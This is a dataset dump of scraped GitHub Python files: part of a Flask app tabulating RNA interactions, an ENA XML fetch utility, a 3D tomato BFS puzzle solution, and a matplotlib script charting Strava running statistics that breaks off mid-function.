fcrossing = []\n\n for elem in range(0, len(ribosome_subunits)):\n bridge_list = UnitPairInteractions.query.filter(\n UnitPairInteractions.unit_id_1.like(ribosome_subunits[elem][0] + '%') &\n UnitPairInteractions.unit_id_2.like(ribosome_subunits[elem][1] + '%'))\n for row in bridge_list:\n unit1.append(row.unit_id_1)\n unit2.append(row.unit_id_2)\n bpair.append(row.f_lwbp)\n bstack.append(row.f_stacks)\n bphosphate.append(row.f_bphs)\n bribose.append(row.f_brbs)\n fcrossing.append(row.f_crossing)\n\n pairwise_info = zip(unit1, unit2, bpair, bstack, bphosphate, bribose)\n\n bridging_interactions = []\n for elem in pairwise_info:\n a = list(filter(lambda a: a != None, elem))\n bridging_interactions.append(a)\n\n unit1 = []\n unit2 = []\n for i in bridging_interactions:\n n_1 = i[0].split('|')[-1]\n n_2 = i[1].split('|')[-1]\n try:\n unit1.append(int(n_1))\n unit2.append(int(n_2))\n except:\n pass\n\n possible_pw = zip(unit1, unit2)\n unique_pw = list(set(possible_pw))\n pw_sorted = sorted(unique_pw, key=lambda element: (element[0], element[1]))\n\n pw_info = {k: OrderedDict({t: '-' for t in pw_sorted}) for k in ife_collection}\n\n for sub_lst in bridging_interactions:\n k0, k1 = '|'.join(sub_lst[0].split('|')[:3]), '|'.join(sub_lst[1].split('|')[:3])\n if k0 in pw_info:\n v1, v2 = sub_lst[0], sub_lst[1]\n # `sub_key` is aimed to be a key for inner dict of the predefined `pw_info` dict\n # thus it's composed as a tuple of trailing numbers of the first 2 items\n # in sub_list (ex. `(262, 263)`)\n sub_key = (int(v1[v1.rfind('|') + 1:]), int(v2[v2.rfind('|') + 1:]))\n pw_info[k0][sub_key] = sub_lst[2] if len(sub_lst) == 3 else ';'.join(sub_lst[2:])\n\n SSU_chain = pw_info.keys()\n LSU_chain = []\n for elem1 in SSU_chain:\n for elem2 in ribosome_subunits:\n if elem1 == elem2[0]:\n LSU_chain.append(elem2[1])\n\n return render_template(\"bridge_table.html\", SSU_chain=SSU_chain, LSU_chain=LSU_chain, pw_info=pw_info, pw_list=pw_sorted)\n # return json.dumps(str(LSU_chain))\n\n@app.route('/trna_interactions')\ndef trna_interactions():\n\n # ife_pairs = [('6BU8|1|A', '6BU8|1|Y'), ('3JCE|1|a', '3JCE|1|6'), ('5UYK|1|A', '5UYK|1|Y'), ('5UYL|1|A', '5UYL|1|Y'), ('5UYM|1|A', '5UYM|1|Y'), ('5UYN|1|A', '5UYN|1|Y'), ('5UYP|1|A', '5UYP|1|Y'), ('5UYQ|1|A', '5UYQ|1|Y'), ('5WDT|1|a', '5WDT|1|y'), ('5WE4|1|a', '5WE4|1|y'), ('5WE6|1|a', '5WE6|1|y'), ('5WF0|1|a', '5WF0|1|y'), ('5WFK|1|a', '5WFK|1|y'), ('5WFS|1|a', '5WFS|1|y'), ('6ENJ|1|a', '6ENJ|1|9'), ('3JBV|1|A', '3JBV|1|V'), ('5JTE|1|AA', '5JTE|1|AW'), ('5LZD|1|a', '5LZD|1|y'), ('5IQR|1|2', '5IQR|1|6'), ('5KPW|1|26', '5KPW|1|30'), ('5KPX|1|26', '5KPX|1|30'), ('5L3P|1|a', '5L3P|1|y'), ('4V6E|1|AA', '4V6E|1|AX'), ('4V6E|1|CA', '4V6E|1|CX')]\n # ife_pairs = [('6BU8|1|A', '6BU8|1|W'), ('3JCE|1|a', '3JCE|1|8'), ('5UYK|1|A', '5UYK|1|W'), ('5UYL|1|A', '5UYL|1|W'), ('5UYM|1|A', '5UYM|1|W'), ('5UYN|1|A', '5UYN|1|W'), ('5UYP|1|A', '5UYP|1|W'), ('5UYQ|1|A', '5UYQ|1|W'), ('5WDT|1|a', '5WDT|1|v'), ('5WE4|1|a', '5WE4|1|v'), ('5WE6|1|a', '5WE6|1|v'), ('5WF0|1|a', '5WF0|1|v'), ('5WFK|1|a', '5WFK|1|v'), ('5WFS|1|a', '5WFS|1|v'), ('6ENJ|1|a', '6ENJ|1|x'), ('3JBV|1|A', '3JBV|1|W'), ('5JTE|1|AA', '5JTE|1|AX'), ('5LZD|1|a', '5LZD|1|v'), ('5IQR|1|2', '5IQR|1|5'), ('5KPW|1|26', '5KPW|1|31'), ('5KPX|1|26', '5KPX|1|31'), ('5L3P|1|a', '5L3P|1|x'), ('4V6E|1|AA', '4V6E|1|AV'), ('4V6E|1|CA', '4V6E|1|CV')]\n # ife_pairs = [('6BU8|1|A', '6BU8|1|X'), ('3JCD|1|a', '3JCD|1|9'), ('3JCE|1|a', '3JCE|1|9'), ('5UYK|1|A', '5UYK|1|X'), ('5UYL|1|A', '5UYL|1|X'), ('5UYM|1|A', '5UYM|1|X'), ('5UYN|1|A', '5UYN|1|X'), ('5UYP|1|A', '5UYP|1|X'), ('5UYQ|1|A', '5UYQ|1|X'), ('5WDT|1|a', '5WDT|1|w'), ('5WE4|1|a', '5WE4|1|w'), ('5WE6|1|a', '5WE6|1|w'), ('5WF0|1|a', '5WF0|1|w'), ('5WFK|1|a', '5WFK|1|w'), ('5WFS|1|a', '5WFS|1|w'), ('3J9Z|1|SA', '3J9Z|1|S7'), ('6DNC|1|A', '6DNC|1|D'), ('6H4N|1|a', '6H4N|1|w'), ('5U4I|1|a', '5U4I|1|y'), ('5U9F|1|A', '5U9F|1|X'), ('5U9G|1|A', '5U9G|1|X'), ('6C4I|1|a', '6C4I|1|y'), ('5JTE|1|AA', '5JTE|1|AY'), ('5JU8|1|AA', '5JU8|1|AY'), ('5IQR|1|2', '5IQR|1|4'), ('5KPS|1|27', '5KPS|1|32'), ('5KPW|1|26', '5KPW|1|32'), ('5KPX|1|26', '5KPX|1|32')]\n ife_pairs = [('6BU8|1|01', '6BU8|1|Y'), ('3JCE|1|A', '3JCE|1|6'), ('5UYK|1|01', '5UYK|1|Y'), ('5UYL|1|01', '5UYL|1|Y'), ('5UYM|1|01', '5UYM|1|Y'), ('5UYN|1|01', '5UYN|1|Y'), ('5UYP|1|01', '5UYP|1|Y'), ('5UYQ|1|01', '5UYQ|1|Y'), ('5WDT|1|A', '5WDT|1|y'), ('5WE4|1|A', '5WE4|1|y'), ('5WE6|1|A', '5WE6|1|y'), ('5WF0|1|A', '5WF0|1|y'), ('5WFK|1|A', '5WFK|1|y'), ('5WFS|1|A', '5WFS|1|y'), ('6ENJ|1|A', '6ENJ|1|9'), ('3JBV|1|b', '3JBV|1|V'), ('5JTE|1|BA', '5JTE|1|AW'), ('5LZD|1|A', '5LZD|1|y'), ('5IQR|1|1', '5IQR|1|6'), ('5KPW|1|27', '5KPW|1|30'), ('5KPX|1|27', '5KPX|1|30'), ('5L3P|1|A', '5L3P|1|y'), ('4V6E|1|BA', '4V6E|1|AX'), ('4V6E|1|DA', '4V6E|1|CX')]\n\n ife_key = []\n for i in ife_pairs:\n ife_key.append(i[1])\n\n unit1 = []\n unit2 = []\n bpair = []\n bstack = []\n bphosphate = []\n bribose = []\n fcrossing = []\n\n for elem in range(0, len(ife_pairs)):\n bridge_list = UnitPairInteractions.query.filter(\n UnitPairInteractions.unit_id_1.like(ife_pairs[elem][0] + '%') &\n UnitPairInteractions.unit_id_2.like(ife_pairs[elem][1] + '%'))\n for row in bridge_list:\n unit1.append(row.unit_id_1)\n unit2.append(row.unit_id_2)\n bpair.append(row.f_lwbp)\n bstack.append(row.f_stacks)\n bphosphate.append(row.f_bphs)\n bribose.append(row.f_brbs)\n fcrossing.append(row.f_crossing)\n\n pairwise_info = zip(unit1, unit2, bpair, bstack, bphosphate, bribose)\n\n pw_interactions = []\n for elem in pairwise_info:\n a = list(filter(lambda a: a != None, elem))\n pw_interactions.append(a)\n\n unit1 = []\n unit2 = []\n for i in pw_interactions:\n n_1 = i[0].split('|')[-1]\n n_2 = i[1].split('|')[-1]\n try:\n unit1.append(int(n_1))\n unit2.append(int(n_2))\n except:\n pass\n\n possible_pw = zip(unit1, unit2)\n unique_pw = list(set(possible_pw))\n pw_sorted = sorted(unique_pw, key=lambda element: (element[0], element[1]))\n\n pw_info = {k: OrderedDict({t: '-' for t in pw_sorted}) for k in ife_key}\n\n\n for sub_lst in pw_interactions:\n k0, k1 = '|'.join(sub_lst[0].split('|')[:3]), '|'.join(sub_lst[1].split('|')[:3])\n if k1 in pw_info:\n v1, v2 = sub_lst[0], sub_lst[1]\n # `sub_key` is aimed to be a key for inner dict of the predefined `pw_info` dict\n # thus it's composed as a tuple of trailing numbers of the first 2 items\n # in sub_list (ex. `(262, 263)`)\n sub_key = (int(v1[v1.rfind('|') + 1:]), int(v2[v2.rfind('|') + 1:]))\n pw_info[k1][sub_key] = sub_lst[2] if len(sub_lst) == 3 else ';'.join(sub_lst[2:])\n\n ife_trna = []\n for i in ife_pairs:\n ife_trna.append(i[1])\n\n index_map = {v: i for i, v in enumerate(ife_trna)}\n pw_info = OrderedDict(sorted(pw_info.items(), key=lambda pair: index_map[pair[0]]))\n\n return render_template(\"trna_interaction.html\", ife_pairs=ife_pairs, pw_info=pw_info, pw_list=pw_sorted)\n \n '''\nif __name__ == '__main__':\n app.run(debug=True)\n", "repo_name": "sridevan/corr-server", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 59657, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.set_printoptions", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 28, "usage_type": "call"}, {"api_name": "flask_bootstrap.Bootstrap", "line_number": 33, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 357, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 357, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 409, "usage_type": "call"}, {"api_name": "itertools.groupby", "line_number": 420, "usage_type": "call"}, {"api_name": "collections.OrderedDict.fromkeys", "line_number": 465, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 465, "usage_type": "name"}, {"api_name": "sqlalchemy.case", "line_number": 552, "usage_type": "call"}, {"api_name": "sqlalchemy.tuple_", "line_number": 559, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 579, "usage_type": "call"}, {"api_name": "flask.json.dumps", "line_number": 598, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 598, "usage_type": "name"}]} +{"seq_id": "34892338536", "text": "import requests\nfrom lxml import etree\nfrom retry import retry\n\n\n@retry(tries=3, delay=2, backoff=1.2, jitter=(1, 3))\ndef download_xml_from_ena(ena_url) -> etree.XML:\n \"\"\"Download and parse XML from ENA\"\"\"\n try: # catches any kind of request error, including non-20X status code\n response = requests.get(ena_url)\n response.raise_for_status()\n except requests.exceptions.RequestException as e:\n raise e\n root = etree.XML(bytes(response.text, encoding='utf-8'))\n return root\n\n\ndef get_assembly_name_and_taxonomy_id(assembly_accession):\n xml_root = download_xml_from_ena(f'https://www.ebi.ac.uk/ena/browser/api/xml/{assembly_accession}')\n xml_assembly = xml_root.xpath('/ASSEMBLY_SET/ASSEMBLY')\n if len(xml_assembly) == 0:\n raise ValueError(f'Assembly {assembly_accession} not found in ENA')\n assembly_name = xml_assembly[0].get('alias')\n taxonomy_id = int(xml_assembly[0].xpath('TAXON/TAXON_ID')[0].text)\n return assembly_name, taxonomy_id\n\n\ndef get_scientific_name_and_common_name(taxonomy_id):\n xml_root = download_xml_from_ena(f'https://www.ebi.ac.uk/ena/browser/api/xml/{taxonomy_id}')\n xml_taxon = xml_root.xpath('/TAXON_SET/taxon')\n if len(xml_taxon) == 0:\n raise ValueError(f'Taxonomy {taxonomy_id} not found in ENA')\n scientific_name = xml_taxon[0].get('scientificName')\n optional_common_name = xml_taxon[0].get('commonName')\n return scientific_name, optional_common_name\n", "repo_name": "EBIvariation/eva-common-pyutils", "sub_path": "ebi_eva_common_pyutils/ena_utils.py", "file_name": "ena_utils.py", "file_ext": "py", "file_size_in_byte": 1465, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 10, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 12, "usage_type": "attribute"}, {"api_name": "lxml.etree.XML", "line_number": 14, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 14, "usage_type": "name"}, {"api_name": "retry.retry", "line_number": 6, "usage_type": "call"}, {"api_name": "lxml.etree.XML", "line_number": 7, "usage_type": "attribute"}, {"api_name": "lxml.etree", "line_number": 7, "usage_type": "name"}]} +{"seq_id": "38065527157", "text": "import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\n\ndef solve():\n m, n, h = map(int, input().split())\n tomato = [[] for _ in range(h)]\n haveto = 0\n tmt = deque()\n for k in range(h):\n for i in range(n):\n tomato[k].append(input().split())\n for j in range(m):\n if tomato[k][i][j] == '0':\n haveto += 1\n elif tomato[k][i][j] == '1':\n tmt.append((k, i, j))\n res = 0\n while tmt and haveto:\n l = len(tmt)\n for _ in range(l):\n hh, x, y = tmt.popleft()\n if x > 0 and tomato[hh][x-1][y] == '0':\n tomato[hh][x-1][y] = 1\n tmt.append((hh, x-1, y))\n haveto -= 1\n if y > 0 and tomato[hh][x][y-1] == '0':\n tomato[hh][x][y-1] = 1\n tmt.append((hh, x, y-1))\n haveto -= 1\n if x < n-1 and tomato[hh][x+1][y] == '0':\n tomato[hh][x+1][y] = 1\n tmt.append((hh, x+1, y))\n haveto -= 1\n if y < m-1 and tomato[hh][x][y+1] == '0':\n tomato[hh][x][y+1] = 1\n tmt.append((hh, x, y+1))\n haveto -= 1\n if hh > 0 and tomato[hh-1][x][y] == '0':\n tomato[hh-1][x][y] = 1\n tmt.append((hh-1, x, y))\n haveto -= 1\n if hh < h-1 and tomato[hh+1][x][y] == '0':\n tomato[hh+1][x][y] = 1\n tmt.append((hh+1, x, y))\n haveto -= 1\n res += 1\n if haveto:\n print(-1)\n else:\n print(res)\n\n\nif __name__ == '__main__':\n solve()\n", "repo_name": "shg9411/algo", "sub_path": "algo_py/boj/bj7569.py", "file_name": "bj7569.py", "file_ext": "py", "file_size_in_byte": 1692, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.stdin", "line_number": 3, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "1774438570", "text": "import sys\nimport os\nimport calendar\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.figure\nimport matplotlib as mpl\n\nfrom typing import Literal, Tuple\nfrom matplotlib.dates import DateFormatter\nfrom matplotlib.ticker import FuncFormatter, MaxNLocator\nfrom utility import load_matplotlib_local_fonts\n\n# ペースの最小値と最大値を設定し、それより速いペースと遅いペースのアクティビティを除外する (min/km)\n# Set the minimum and maximum pace (min/km) and filter out activities that are faster or slower than that\nMIN_PACE = 3\nMAX_PACE = 10\n\n# 距離の最小値を設定し、それより短い距離のアクティビティを除外する (km)\n# Set the minimum distance (km) and filter out activities that are shorter than that\nMIN_DISTANCE = 0.5\n\n# 丸のサイズを設定する\n# Set the size of the markers\nmpl.rcParams[\"lines.markersize\"] = 3.9\n\n# フォントを設定する\n# Set the font\nload_matplotlib_local_fonts(\"fonts/ipaexg.ttf\", 12)\n\n# 他の設定\nmpl.rcParams[\"axes.axisbelow\"] = True\nmpl.rcParams[\"legend.fontsize\"] = \"small\"\nSAVE_FIG_DPI = 300\n\n\ndef preprocess_df(df: pd.DataFrame, activity_type=\"Run\") -> pd.DataFrame:\n \"\"\"Preprocess the DataFrame to prepare for plotting.\"\"\"\n\n # Filter by activity type\n df = df[df[\"type\"] == activity_type].copy()\n\n # Convert date to datetime object\n df[\"date\"] = pd.to_datetime(df[\"date\"])\n\n df.loc[:, \"time_of_day\"] = (\n pd.to_datetime(df[\"time_of_day\"], format=\"%H:%M:%S\").dt.hour * 3600\n + pd.to_datetime(df[\"time_of_day\"], format=\"%H:%M:%S\").dt.minute * 60\n + pd.to_datetime(df[\"time_of_day\"], format=\"%H:%M:%S\").dt.second\n )\n\n # !Filter out average pace that is too fast or too slow\n df = df.query(\"@MIN_PACE <= average_pace_min_km <= @MAX_PACE\")\n\n # !Filter out distance that is too short\n df = df.query(\"@MIN_DISTANCE <= distance_km\")\n\n return df\n\n\ndef fit_data(\n df: pd.DataFrame, y_col: str, deg: int = 5\n) -> Tuple[np.ndarray, np.ndarray, np.poly1d]:\n \"\"\"Fit data with polynomial of degree 'deg'.\"\"\"\n date_as_number = (df[\"date\"] - df[\"date\"].min()).dt.days\n coefficients = np.polyfit(date_as_number, df[y_col], deg)\n polynomial = np.poly1d(coefficients)\n xfit = np.linspace(date_as_number.min(), date_as_number.max(), 1000)\n yfit = polynomial(xfit)\n\n return xfit, yfit, polynomial\n\n\ndef scatter_plots_from_df(df: pd.DataFrame) -> matplotlib.figure.Figure:\n \"\"\"Generate scatter plots from the DataFrame.\"\"\"\n fig, axs = plt.subplots(2, 1, figsize=[10, 10])\n\n # Scatter plot distance vs average pace, colored by average heart rate\n scatter0 = axs[0].scatter(\n df[\"distance_km\"],\n df[\"average_pace_min_km\"],\n c=df[\"average_heart_rate_bpm\"],\n cmap=\"Reds\",\n )\n axs[0].set_xlabel(\"距離 (km) [Distance]\")\n axs[0].set_ylabel(\"平均ペース (min/km) [Average Pace]\")\n axs[0].grid(True, linewidth=0.75)\n axs[0].invert_yaxis()\n cbar0 = fig.colorbar(scatter0, ax=axs[0])\n cbar0.set_label(\"平均心拍数 (bpm) [Average Heart Rate]\")\n\n # Scatter plot time of day vs distance, colored by kudos\n default_marker_size = mpl.rcParams[\"lines.markersize\"]\n scatter1 = axs[1].scatter(\n df[\"time_of_day\"],\n df[\"distance_km\"],\n c=df[\"kudos\"],\n s=np.maximum(df[\"kudos\"] * 5, default_marker_size**2),\n cmap=\"rainbow\",\n )\n axs[1].set_xlabel(\"時間帯 (hh:mm) [Time of Day]\")\n axs[1].set_ylabel(\"距離 (km) [Distance]\")\n axs[1].xaxis.set_major_locator(MaxNLocator(nbins=9))\n axs[1].xaxis.set_major_formatter(\n FuncFormatter(\n lambda x, pos: \"{:02}:{:02}\".format(\n int(x // 3600), int((x % 3600) // 60))\n )\n )\n axs[1].set_xlim([0, 24 * 3600])\n axs[1].grid(True, linewidth=0.75)\n cbar1 = fig.colorbar(scatter1, ax=axs[1])\n cbar1.set_label(\"kudos\")\n\n fig.tight_layout()\n\n return fig\n\n\ndef plot_basic_stat_from_df(df: pd.DataFrame) -> matplotlib.figure.Figure:\n \"\"\"Plot basic statistics from a dataframe of activities.\"\"\"\n\n fig, axs = plt.subplots(4, 1, figsize=[15, 30], sharex=True)\n\n # Plot distance (bar chart)\n axs[0].bar(\n df[\"date\"],\n df[\"distance_km\"],\n color=\"#34ACE4\",\n align=\"center\",\n )\n axs[0].set_ylabel(\"距離 (km) [Distance]\")\n axs[0].tick_params(\"x\", labelbottom=False)\n axs[0].yaxis.set_major_locator(MaxNLocator(nbins=6))\n axs[0].grid(True, axis=\"y\", linestyle=\"--\", linewidth=0.75)\n\n # Annotate the bars with the number of kudos\n for i, v in enumerate(df[\"distance_km\"]):\n axs[0].text(\n df[\"date\"].iloc[i],\n v + 0.1,\n str(df[\"kudos\"].iloc[i]),\n color=\"black\",\n ha=\"center\",\n fontsize=4.5,\n )\n\n # Plot distance (line chart)\n axs[1].plot_date(\n df[\"date\"], df[\"distance_km\"], \"#FC4C02\", marker=\"o\", markerfacecolor=\"white\"\n )\n axs[1].fill_between(df[\"date\"], df[\"distance_km\"],\n color=\"#FC4C02\", alpha=0.1)\n axs[1].set_ylabel(\"距離 (km) [Distance]\")\n axs[1].tick_params(\"x\", labelbottom=False)\n axs[1].yaxis.set_major_locator(MaxNLocator(nbins=6))\n axs[1].grid(True, linestyle=\"--\", linewidth=0.75)\n\n # Plot altitude gains (bar chart)\n axs[2].bar(\n df[\"date\"],\n df[\"altitude_gains_m\"],\n color=\"#617A55\",\n align=\"center\",\n )\n axs[2].set_ylabel(\"獲得標高 (m) [Altitude Gains]\")\n axs[2].tick_params(\"x\", labelbottom=False)\n axs[2].yaxis.set_major_locator(MaxNLocator(nbins=6))\n axs[2].yaxis.set_major_formatter(\n FuncFormatter(lambda x, _: \"{:.0f}\".format(x)))\n axs[2].grid(True, axis=\"y\", linestyle=\"--\", linewidth=0.75)\n\n # Plot duration (scatter chart)\n axs[3].scatter(\n df[\"date\"],\n df[\"duration_min\"],\n color=\"#AB68FF\",\n )\n axs[3].set_ylabel(\"時間 (min) [Duration]\")\n\n # Fit the data\n xfit, yfit, polynomial = fit_data(df, \"duration_min\")\n xfit_dates = df[\"date\"].min() + pd.to_timedelta(xfit, \"D\")\n fitting_label = f\"カーブフィッティング (次数 {len(polynomial)})\\nCurve Fitting (Degree {len(polynomial)})\"\n axs[3].plot(\n xfit_dates,\n yfit,\n color=\"#AB68FF\",\n alpha=0.75,\n linestyle=\"--\",\n linewidth=1.5,\n label=fitting_label,\n )\n axs[3].fill_between(xfit_dates, yfit, color=\"#AB68FF\", alpha=0.1)\n axs[3].grid(True, linestyle=\"--\", linewidth=0.75)\n axs[3].legend()\n\n fig.tight_layout()\n fig.subplots_adjust(bottom=0.035)\n\n return fig\n\n\ndef plot_detailed_stat_from_df(df: pd.DataFrame) -> matplotlib.figure.Figure:\n \"\"\"Plot detailed statistics from a dataframe of activities.\"\"\"\n fig, axs = plt.subplots(4, 1, figsize=[15, 30], sharex=True)\n\n # Plot distance (line chart)\n axs[0].scatter(df[\"date\"], df[\"distance_km\"], color=\"#FC4C02\", marker=\"o\")\n axs[0].set_ylabel(\"距離 (km) [Distance]\")\n axs[0].tick_params(\"x\", labelbottom=False)\n axs[0].yaxis.set_major_locator(MaxNLocator(nbins=6))\n axs[0].grid(True, linestyle=\"--\", linewidth=0.75)\n # Fit the data\n xfit, yfit, polynomial = fit_data(df, \"distance_km\")\n xfit_dates = df[\"date\"].min() + pd.to_timedelta(xfit, \"D\")\n fitting_label = f\"カーブフィッティング (次数 {len(polynomial)})\\nCurve Fitting (Degree {len(polynomial)})\"\n axs[0].plot(\n xfit_dates,\n yfit,\n color=\"#FC4C02\",\n linestyle=\"--\",\n alpha=0.75,\n linewidth=1.5,\n label=fitting_label,\n )\n axs[0].fill_between(xfit_dates, yfit, color=\"#FC4C02\", alpha=0.1)\n axs[0].grid(True, linestyle=\"--\", linewidth=0.75)\n axs[0].legend()\n\n # Plot calories burned (bar chart)\n axs[1].bar(df[\"date\"], df[\"calories_kcal\"],\n color=\"#EBD944\", align=\"center\")\n axs[1].set_ylabel(\"カロリー (kcal) [Calories]\")\n axs[1].tick_params(\"x\", labelbottom=False)\n axs[1].grid(True, axis=\"y\", linestyle=\"--\", linewidth=0.75)\n\n # Plot average heart rate (scatter plot)\n axs[2].plot_date(df[\"date\"], df[\"average_heart_rate_bpm\"], color=\"#D6324B\")\n axs[2].set_ylabel(\"平均心拍数 (bpm)\\n[Average Heart Rate]\")\n axs[2].tick_params(\"x\", labelbottom=False)\n axs[2].grid(True, linestyle=\"--\", linewidth=0.75)\n\n # Plot average pace (scatter plot)\n axs[3].scatter(df[\"date\"], df[\"average_pace_min_km\"], color=\"#19A7CE\")\n axs[3].set_ylabel(\"平均ペース (min/km)\\n[Average Pace]\")\n axs[3].yaxis.set_major_locator(MaxNLocator(nbins=6))\n axs[3].grid(True, linestyle=\"--\", linewidth=0.75)\n\n # Fit the data\n xfit, yfit, polynomial = fit_data(df, \"average_pace_min_km\")\n xfit_dates = df[\"date\"].min() + pd.to_timedelta(xfit, \"D\")\n fitting_label = f\"カーブフィッティング (次数 {len(polynomial)})\\nCurve Fitting (Degree {len(polynomial)})\"\n axs[3].plot(\n xfit_dates,\n yfit,\n color=\"#FC4C02\",\n alpha=0.75,\n linestyle=\"-\",\n linewidth=1.5,\n label=fitting_label,\n )\n axs[3].legend()\n axs[3].invert_yaxis()\n\n # Formatting date\n date_format = DateFormatter(\"%Y-%m\")\n axs[3].xaxis.set_major_formatter(date_format)\n\n fig.tight_layout()\n fig.subplots_adjust(bottom=0.035)\n\n return fig\n\n\ndef scatter_3d_plot_from_df(df: pd.DataFrame) -> matplotlib.figure.Figure:\n \"\"\"Plot a 3D scatter plot from a dataframe of activities.\"\"\"\n fig = plt.figure(figsize=[10, 10])\n ax = fig.add_subplot(111, projection=\"3d\")\n\n # Check if 'temperature_c' column is all NaN\n if df[\"temperature_c\"].isnull().all():\n plt.title(\"get_weather_data.pyを実行してください。\\nPlease run get_weather_data.py.\")\n # If all values are NaN, return the empty plot\n return fig\n\n scatter = ax.scatter(\n df[\"average_pace_min_km\"],\n df[\"duration_min\"],\n df[\"temperature_c\"],\n c=df[\"average_heart_rate_bpm\"],\n s=40,\n cmap=\"Reds\",\n )\n ax.set_xlabel(\"平均ペース (min/km) [Average Pace]\")\n ax.set_ylabel(\"時間 (min) [Duration]\")\n ax.set_zlabel(\"気温 (℃) [Temperature]\")\n cbar = fig.colorbar(scatter, ax=ax)\n cbar.set_label(\"平均心拍数 (bpm) [Average Heart Rate]\")\n fig.tight_layout()\n\n return fig\n\n\ndef categorize_time_of_day(\n time_in_seconds: int,\n) -> Literal[\"朝: 5:00 - 12:00 (Morning)\", \"昼: 12:00 - 18:00 (Afternoon)\", \"夜: 18:00 - 5:00 (Night)\"]:\n \"\"\"Categorize time of day into morning, afternoon, and night.\"\"\"\n if 5 * 3600 <= time_in_seconds < 12 * 3600:\n return \"朝: 5:00 - 12:00 (Morning)\" # Morning: 5:00 - 12:00\n elif 12 * 3600 <= time_in_seconds < 18 * 3600:\n return \"昼: 12:00 - 18:00 (Afternoon)\" # Afternoon: 12:00 - 18:00\n else:\n return \"夜: 18:00 - 5:00 (Night)\" # Night: 18:00 - 5:00\n\n\ndef plot_pie_chart_from_df(df: pd.DataFrame) -> matplotlib.figure.Figure:\n \"\"\"Plot a pie chart from a dataframe of activities.\"\"\"\n df[\"period_of_day\"] = df[\"time_of_day\"].apply(categorize_time_of_day)\n\n # Group by period of day\n group = df.groupby(\"period_of_day\").size()\n\n # Set colors\n color_map = {\n \"朝: 5:00 - 12:00 (Morning)\": \"#E6DF44\",\n \"昼: 12:00 - 18:00 (Afternoon)\": \"#F0810F\",\n \"夜: 18:00 - 5:00 (Night)\": \"#063852\",\n }\n colors = [color_map[i] for i in group.index]\n\n fig, ax = plt.subplots(2, 2, figsize=(15, 10))\n\n # Pie chart\n wedges, labels, autopct_texts = ax[0, 0].pie(\n group,\n labels=group.index.tolist(),\n autopct=lambda p: f\"{p:.1f}% ({int(p * sum(group) / 100)})\",\n startangle=90,\n colors=colors,\n textprops={\"color\": \"black\"},\n wedgeprops={\"edgecolor\": \"white\"},\n )\n\n ax[0, 0].axis(\"equal\")\n ax[0, 0].set_title(\"一日の活動時間割合 [Activity Time of Day]\")\n\n # Change color of text in 'Night' section to white\n for label, pct in zip(labels, autopct_texts):\n if label.get_text() == \"夜: 18:00 - 5:00 (Night)\":\n pct.set_color(\"white\")\n\n # Bar plot for Day of Week\n # Translate weekday names to Japanese\n days_english_to_japanese = {\n \"Monday\": \"月 (Mon)\",\n \"Tuesday\": \"火 (Tue)\",\n \"Wednesday\": \"水 (Wed)\",\n \"Thursday\": \"木 (Thu)\",\n \"Friday\": \"金 (Fri)\",\n \"Saturday\": \"土 (Sat)\",\n \"Sunday\": \"日 (Sun)\",\n }\n days = [\"月 (Mon)\", \"火 (Tue)\", \"水 (Wed)\", \"木 (Thu)\",\n \"金 (Fri)\", \"土 (Sat)\", \"日 (Sun)\"]\n df[\"day_of_week\"] = df[\"date\"].dt.weekday.apply(\n lambda x: list(calendar.day_name)[x]\n )\n df[\"day_of_week\"] = df[\"day_of_week\"].map(days_english_to_japanese)\n day_counts = df[\"day_of_week\"].value_counts().reindex(days)\n\n ax[0, 1].bar(day_counts.index, day_counts.values.tolist(), color=\"#18A545\")\n ax[0, 1].set_title(\"日別頻度 [Daily Frequency]\")\n ax[0, 1].set_xlabel(\"曜日 [Day of Week]\")\n ax[0, 1].set_ylabel(\"活動数 [Number of Activities]\")\n ax[0, 1].grid(True, axis=\"y\", linestyle=\"--\", linewidth=0.75)\n\n # Bar plot for Month\n df[\"month\"] = df[\"date\"].dt.month\n month_counts = df[\"month\"].value_counts().reindex(\n range(1, 13), fill_value=0)\n\n ax[1, 1].bar(month_counts.index,\n month_counts.values.tolist(), color=\"#457B9D\")\n ax[1, 1].set_title(\"月別頻度 [Monthly Frequency]\")\n ax[1, 1].set_xlabel(\"月 [Month]\")\n ax[1, 1].set_xticks(range(1, 13))\n ax[1, 1].set_ylabel(\"活動数 [Number of Activities]\")\n ax[1, 1].grid(True, axis=\"y\", linestyle=\"--\", linewidth=0.75)\n\n # Bar plot for Year\n df[\"year\"] = df[\"date\"].dt.year\n year_counts = df[\"year\"].value_counts().sort_index()\n\n ax[1, 0].bar(year_counts.index,\n year_counts.values.tolist(), color=\"#FC4C02\")\n ax[1, 0].set_title(\"年別頻度 [Yearly Frequency]\")\n ax[1, 0].set_xlabel(\"年 [Year]\")\n ax[1, 0].set_ylabel(\"活動数 [Number of Activities]\")\n ax[1, 0].set_xticks(year_counts.index)\n ax[1, 0].grid(True, axis=\"y\", linestyle=\"--\", linewidth=0.75)\n\n plt.tight_layout()\n return fig\n\n\ndef plot_histograms_from_df(df: pd.DataFrame) -> matplotlib.figure.Figure:\n \"\"\"Plot histograms of distance and duration from a dataframe of activities.\"\"\"\n\n fig, axs = plt.subplots(3, 1, figsize=[8, 10])\n\n # 